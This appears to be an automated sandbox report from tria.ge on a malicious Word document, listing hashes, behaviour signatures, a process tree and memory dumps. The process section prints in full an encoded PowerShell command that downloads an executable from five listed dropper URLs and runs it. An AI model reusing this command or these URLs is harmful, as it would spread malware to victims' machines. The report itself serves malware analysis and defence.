Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28/05/2024, 14:27

General

  • Target

    7d4a88e3197c77c0baaa1200d916a769_JaffaCakes118.doc

  • Size

    233KB

  • MD5

    7d4a88e3197c77c0baaa1200d916a769

  • SHA1

    bee5d88b478a9bbc3332eb8c3ee9b1cecfd9e88b

  • SHA256

    f954e89b36a77905275265bd2fb0d06598eac1367a986b8f882830b42b87b511

  • SHA512

    cbc9e32e2ead3872521e69bc093fe3f190d612c3d96dc86fb01bb68f86b3aa1d8692c1045be8da46f64a6ecf5ce21baf2742979e889a0b34003b3c7f7e82c7c8

  • SSDEEP

    3072:Ej6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGk2B+8ymwaF+Rc:EHgtEWPsL/aTyT9Gk2BBymwaQRc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://synologlogin.com/cgi-bin/ho_iewdm_x99w/

exe.dropper

http://tz005.com/aspnet_client/system_web/upao5_p_i/

exe.dropper

http://nucleokardecistalace.org.br/wp-includes/hnor_qz_n66fskbujg/

exe.dropper

http://m.hepingzyy120.com/mbsz/tg_h9_9tkc5xa2/

exe.dropper

http://identisoft.pt/istore/xz_nf_fql8v7nx/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7d4a88e3197c77c0baaa1200d916a769_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2752
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABSAGIAegBoAHgAZQB4AD0AJwBOAHkAOQAzADAANABoACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAEMAVQByAGkAVABZAGAAcAByAE8AdABPAGMAYABvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABUAHUAbAB6AGMAeQB4ACAAPQAgACcAWgB3AHoAbQAnADsAJABSAHUAdgBhADIAXwBoAD0AJwBOAHgAcABsAG8AdwB3ACcAOwAkAFkAbgA4AGEAYQB2AG8APQAkAGUAbgB2ADoAdABlAG0AcAArACcAXAAnACsAJABUAHUAbAB6AGMAeQB4ACsAJwAuAGUAeABlACcAOwAkAEMAdAAzADUAMgBfAHIAPQAnAFEAdwAwADkAbgBtADQAJwA7ACQAVAB4AG8AcAB2AHYAdQA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAFQALgB3AEUAQgBjAEwAaQBlAG4AdAA7ACQAUABmADgAMAB1ADUAbQA9ACcAaAB0AHQAcAA6AC8ALwBzAHkAbgBvAGwAbwBnAGwAbwBnAGkAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGgAbwBfAGkAZQB3AGQAbQBfAHgAOQA5AHcALwAqAGgAdAB0AHAAOgAvAC8AdAB6ADAAMAA1AC4AYwBvAG0ALwBhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AC8AcwB5AHMAdABlAG0AXwB3AGUAYgAvAHUAcABhAG8ANQBfAHAAXwBpAC8AKgBoAHQAdABwADoALwAvAG4AdQBjAGwAZQBvAGsAYQByAGQAZQBjAGkAcwB0AGEAbABhAGMAZQAuAG8AcgBnAC4AYgByAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaABuAG8AcgBfAHEAegBfAG4ANgA2AGYAcwBrAGIAdQBqAGcALwAqAGgAdAB0AHAAOgAvAC8AbQAuAGgAZQBwAGkAbgBnAHoAeQB5ADEAMgAwAC4AYwBvAG0ALwBtAGIAcwB6AC8AdABnAF8AaAA5AF8AOQB0AGsAYwA1AHgAYQAyAC8AKgBoAHQAdABwADoALwAvAGkAZABlAG4AdABpAHMAbwBmAHQALgBwAHQALwBpAHMAdABvAHIAZQAvAHgAegBfAG4AZgBfAGYAcQBsADgAdgA3AG4AeAAvACcALgAiAHMAUABMAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARgBxAGMAZQByAHoAcgA9ACcAWQB5AG8AOABpAHgAbwAnADsAZgBvAHIAZQBhAGMAaAAoACQAWgBiAG0AagAwADMAMgAgAGkAbgAgACQAUABmADgAMAB1ADUAbQApAHsAdAByAHkAewAkAFQAeABvAHAAdgB2AHUALgAiAEQAYABvAHcAbgBsAGAAbwBBAEQAZgBgAEkAbABlACIAKAAkAFoAYgBtAGoAMAAzADIALAAgACQAWQBuADgAYQBhAHYAbwApADsAJABGAGsAOABtAGgAeQBxAD0AJwBDAGoAbwBlAGIAagB4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWQBuADgAYQBhAHYAbwApAC4AIgBMAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwA0ADMANAApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACgAJABZAG4AOABhAGEAdgBvACkAOwAkAEkAZQAwAHUAcgBxAG8APQAnAEQAOABkAHYAdgBkAF8AJwA7AGIAcgBlAGEAawA7ACQAUQAyAGMAcQBxADgAdQA9ACcASgBiAGgAbABtAHYAeQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAGIAOAB0AHEANAAxAD0AJwBOAGsAYgAyAG4AZABzACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2388

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      36504ea1bc2991ab17874bc9483757d4

      SHA1

      cabf63e03a52c77cc6ad0c608dd136d60fbfaf0a

      SHA256

      63f84a54a350675242e62a47bd5b8d87a637f7fb62e9c9486f5f2a457dca5b89

      SHA512

      35f6c3e20b8e6ebb8ddfb7ed036c3071435d876effe376388389953b0a7030a85a784dd2f0f171e5e8885eedb87feded7c82118ba1e26948d77df3000028ec86

    • memory/2388-43-0x000000001B450000-0x000000001B732000-memory.dmp

      Filesize

      2.9MB

    • memory/2388-44-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

      Filesize

      32KB

    • memory/2752-36-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-32-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-8-0x00000000004C0000-0x00000000005C0000-memory.dmp

      Filesize

      1024KB

    • memory/2752-17-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-26-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-31-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-33-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-35-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-37-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-0-0x000000002F0C1000-0x000000002F0C2000-memory.dmp

      Filesize

      4KB

    • memory/2752-34-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-7-0x00000000004C0000-0x00000000005C0000-memory.dmp

      Filesize

      1024KB

    • memory/2752-6-0x00000000004C0000-0x00000000005C0000-memory.dmp

      Filesize

      1024KB

    • memory/2752-2-0x000000007118D000-0x0000000071198000-memory.dmp

      Filesize

      44KB

    • memory/2752-45-0x000000007118D000-0x0000000071198000-memory.dmp

      Filesize

      44KB

    • memory/2752-49-0x00000000004C0000-0x00000000005C0000-memory.dmp

      Filesize

      1024KB

    • memory/2752-50-0x0000000005EB0000-0x0000000005FB0000-memory.dmp

      Filesize

      1024KB

    • memory/2752-52-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-53-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

    • memory/2752-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2752-69-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2752-70-0x000000007118D000-0x0000000071198000-memory.dmp

      Filesize

      44KB

    • memory/2752-71-0x00000000004C0000-0x00000000005C0000-memory.dmp

      Filesize

      1024KB